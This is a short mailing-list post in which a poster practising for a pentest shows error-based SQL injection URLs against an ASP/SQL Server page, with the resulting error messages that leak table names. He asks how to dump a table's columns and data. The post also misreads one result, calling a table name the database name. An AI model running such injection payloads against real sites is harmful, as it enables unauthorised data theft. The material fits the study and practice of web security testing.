SQL Injection data retrieving??

[Roland Despins <roland2004 () romandie com>]

Hi,

I'm practicing myself for a pentest. I'm trying to retrieve datas from a DB using some SQL injections. 

> From now I asume that my WebApp is vulnerable to SQLinjections.

First I've sent this URL:

www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' order by asc))

And I've goot the following error:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value '__big_field' to a column of data type int.
/products.asp, line 32

I assume that "__big_field" is the name of the databse? Right?


Secondly I've sent the the following URL in order to get the table name:

www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' and name>'__big_field' 
order by 1 asc))


Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value '__dellist' to a column of data type int.
/products.asp, line 32


So "__dellist" is a table from the "__big_field" database? Right?


Now here comes the troubles... I would like to retrieve the columns name of the "__dellist" table and the data of the 
"__dellist".

I've sent: 

www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))


Error Type:
Microsoft OLE DB Provider for SQL Server (0x80004005)
Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the 
subquery is used as an expression.
/products.asp, line 32


My question is: Which query should I sent i order to retrieve the data of the table??


Thanks a lot in advance for your help


Roland